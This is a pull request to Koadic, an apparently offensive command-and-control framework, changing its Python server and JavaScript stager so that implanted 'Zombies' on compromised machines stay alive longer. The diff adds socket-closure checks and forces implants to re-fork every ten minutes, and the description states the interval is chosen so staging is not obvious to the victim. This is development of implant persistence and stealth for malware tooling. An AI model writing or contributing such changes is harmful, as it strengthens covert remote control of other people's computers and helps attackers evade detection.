### PR TITLE
Fixed issues with Zombie lifespan

### DIFF
--- a/core/handler.py
+++ b/core/handler.py
@@ -187,6 +187,7 @@ class Handler(BaseHTTPRequestHandler):
         self.reply(200, script)
 
     def handle_work(self):
+        count = 0
         while True:
             if self.session.killed:
                 return self.reply(500, "");
@@ -195,8 +196,17 @@ class Handler(BaseHTTPRequestHandler):
             if job is not None:
                 break
 
-            time.sleep(1)
+            try:
+                self.request.settimeout(1)
+                if len(self.request.recv(1)) == 0:
+                    return
+            except Exception as e:
+                pass
             self.session.update_active()
+            count += 1
+            if count > 600:
+                self.reply(201, "")
+                return
 
         job.receive()
 

--- a/data/stager/js/stage.js
+++ b/data/stager/js/stage.js
@@ -38,8 +38,10 @@ function DoWork()
         // 202 = force x86
         if (work.status == 201 || work.status == 202)
         {
-            var jobkey = work.responseText;
-            Koadic.work.fork(jobkey, work.status == 202);
+            if (work.responseText.length > 0) {
+                var jobkey = work.responseText;
+                Koadic.work.fork(jobkey, work.status == 202);
+            }
         }
         else // if (work.status == 500) // kill code
         {


### PR DESCRIPTION
This PR takes care of two issues that are present with Zombie life status and span.

First, Koadic wasn't checking for when socket connections were closed before attempting to issue jobs to Zombies. Because of this, Zombies were represented as Alive, when actually the socket had closed and the Zombies were Dead. It was only when you attempted to issue a job to a Zombie that an unhandled exception was thrown because the socket was closed and then the Zombie would be classified as dead. This PR now reads from the socket every second and handles Exceptions as they occur. Normal logic flow then correctly takes care of classifying a Zombie as dead.

Second, Zombies would just... die. After about an 1.5 hours of inactivity, the connection would be closed and no further jobs could be issued to those zombies. This PR forces the zombie to fork every 10 minutes if a new job hasn't been assigned to it yet. This should be short enough such that the Zombie won't just die, yet long enough so that it isn't obvious that a Zombie has been staged.